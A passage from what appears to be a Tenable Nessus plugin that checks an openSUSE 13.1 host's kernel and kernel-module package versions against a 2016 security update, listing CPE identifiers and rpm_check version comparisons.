value:\"p-cpe:/a:novell:opensuse:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libipset3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libipset3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-controller-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-pki\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-switch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-switch-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-openvswitch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-openvswitch-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-virtualbox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-x11-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-qt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-qt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-websrv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-websrv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-domU-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-xend-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-xend-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-2.639-11.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-debuginfo-2.639-11.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-debugsource-2.639-11.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-default-2.639_k3.12.57_44-11.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-default-debuginfo-2.639_k3.12.57_44-11.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-desktop-2.639_k3.12.57_44-11.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-desktop-debuginfo-2.639_k3.12.57_44-11.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-pae-2.639_k3.12.57_44-11.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-pae-debuginfo-2.639_k3.12.57_44-11.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-xen-2.639_k3.12.57_44-11.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-xen-debuginfo-2.639_k3.12.57_44-11.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-7.0.2-2.28.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-debuginfo-7.0.2-2.28.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-debugsource-7.0.2-2.28.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-devel-7.0.2-2.28.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-eppic-7.0.2-2.28.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-eppic-debuginfo-7.0.2-2.28.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-gcore-7.0.2-2.28.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-gcore-debuginfo-7.0.2-2.28.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-default-7.0.2_k3.12.57_44-2.28.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-default-debuginfo-7.0.2_k3.12.57_44-2.28.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-desktop-7.0.2_k3.12.57_44-2.28.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-desktop-debuginfo-7.0.2_k3.12.57_44-2.28.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-pae-7.0.2_k3.12.57_44-2.28.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-pae-debuginfo-7.0.2_k3.12.57_44-2.28.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-xen-7.0.2_k3.12.57_44-2.28.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-xen-debuginfo-7.0.2_k3.12.57_44-2.28.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-debugsource-1.28-16.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-default-1.28_k3.12.57_44-16.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-default-debuginfo-1.28_k3.12.57_44-16.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-desktop-1.28_k3.12.57_44-16.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-desktop-debuginfo-1.28_k3.12.57_44-16.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-pae-1.28_k3.12.57_44-16.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-pae-debuginfo-1.28_k3.12.57_44-16.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-xen-1.28_k3.12.57_44-16.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-xen-debuginfo-1.28_k3.12.57_44-16.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-6.21.1-2.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-debuginfo-6.21.1-2.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-debugsource-6.21.1-2.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-devel-6.21.1-2.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-default-6.21.1_k3.12.57_44-2.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-default-debuginfo-6.21.1_k3.12.57_44-2.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-desktop-6.21.1_k3.12.57_44-2.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-desktop-debuginfo-6.21.1_k3.12.57_44-2.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-pae-6.21.1_k3.12.57_44-2.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-pae-debuginfo-6.21.1_k3.12.57_44-2.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-xen-6.21.1_k3.12.57_44-2.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-xen-debuginfo-6.21.1_k3.12.57_44-2.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-1.4.20.3-13.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-debuginfo-1.4.20.3-13.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-debugsource-1.4.20.3-13.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-default-1.4.20.3_k3.12.57_44-13.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-default-debuginfo-1.4.20.3_k3.12.57_44-13.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-desktop-1.4.20.3_k3.12.57_44-13.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-desktop-debuginfo-1.4.20.3_k3.12.57_44-13.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-pae-1.4.20.3_k3.12.57_44-13.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-pae-debuginfo-1.4.20.3_k3.12.57_44-13.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-xen-1.4.20.3_k3.12.57_44-13.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-xen-debuginfo-1.4.20.3_k3.12.57_44-13.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-base-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-base-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-debuginfo-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-debugsource-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-devel-3.12.57-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-devel-3.12.57-44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-macros-3.12.57-44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-source-3.12.57-44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-source-vanilla-3.12.57-44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-syms-3.12.57-44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libipset3-6.21.1-2.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libipset3-debuginfo-6.21.1-2.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-1.58-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-debuginfo-1.58-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-debugsource-1.58-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-kmp-default-1.58_k3.12.57_44-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-kmp-default-debuginfo-1.58_k3.12.57_44-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-kmp-desktop-1.58_k3.12.57_44-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-kmp-desktop-debuginfo-1.58_k3.12.57_44-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-kmp-pae-1.58_k3.12.57_44-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-kmp-pae-debuginfo-1.58_k3.12.57_44-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-1.11.0-0.35.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-controller-1.11.0-0.35.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-controller-debuginfo-1.11.0-0.35.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-debuginfo-1.11.0-0.35.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-debugsource-1.11.0-0.35.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-kmp-default-1.11.0_k3.12.57_44-0.35.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-kmp-default-debuginfo-1.11.0_k3.12.57_44-0.35.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-kmp-desktop-1.11.0_k3.12.57_44-0.35.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-kmp-desktop-debuginfo-1.11.0_k3.12.57_44-0.35.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-kmp-pae-1.11.0_k3.12.57_44-0.35.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-kmp-pae-debuginfo-1.11.0_k3.12.57_44-0.35.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-kmp-xen-1.11.0_k3.12.57_44-0.35.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-kmp-xen-debuginfo-1.11.0_k3.12.57_44-0.35.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-pki-1.11.0-0.35.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-switch-1.11.0-0.35.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-switch-debuginfo-1.11.0-0.35.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-test-1.11.0-0.35.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-0.44-258.29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-debuginfo-0.44-258.29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-debugsource-0.44-258.29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-kmp-default-0.44_k3.12.57_44-258.29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-kmp-default-debuginfo-0.44_k3.12.57_44-258.29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-kmp-desktop-0.44_k3.12.57_44-258.29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-kmp-desktop-debuginfo-0.44_k3.12.57_44-258.29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-kmp-pae-0.44_k3.12.57_44-258.29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-kmp-pae-debuginfo-0.44_k3.12.57_44-258.29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-openvswitch-1.11.0-0.35.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-openvswitch-test-1.11.0-0.35.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-virtualbox-4.2.36-2.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-virtualbox-debuginfo-4.2.36-2.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-debugsource-20130607-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-default-20130607_k3.12.57_44-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-default-debuginfo-20130607_k3.12.57_44-2.28.1\") ) flag++;\nif ( 